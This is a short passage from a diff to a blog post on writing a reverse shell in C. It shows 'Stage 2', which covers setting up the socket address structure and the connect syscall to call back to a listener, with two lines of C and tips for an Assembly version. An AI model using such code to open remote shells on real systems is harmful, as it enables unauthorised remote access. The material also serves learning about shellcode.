J33R4FF3/J33R4FF3.github.io/_posts/2021-02-09-Creating-A-Reverse-Shell-In-C.md

 <h3>Stage 2 - Initiate the connection back to remote server</h3>

+Let's now construct the data structure for the connect syscall to use and initiate the actual connection back to our listener.
+Remember to use python to figure out what values to put in your Assembly code.
+Remember that our sock file descriptor is already stored in rdi for this step.

 ```c
 server.sin_family = AF_INET; //Address Family
 server.sin_port = htons(atoi(arguments[2])); //Network Byte order of the port to bind to.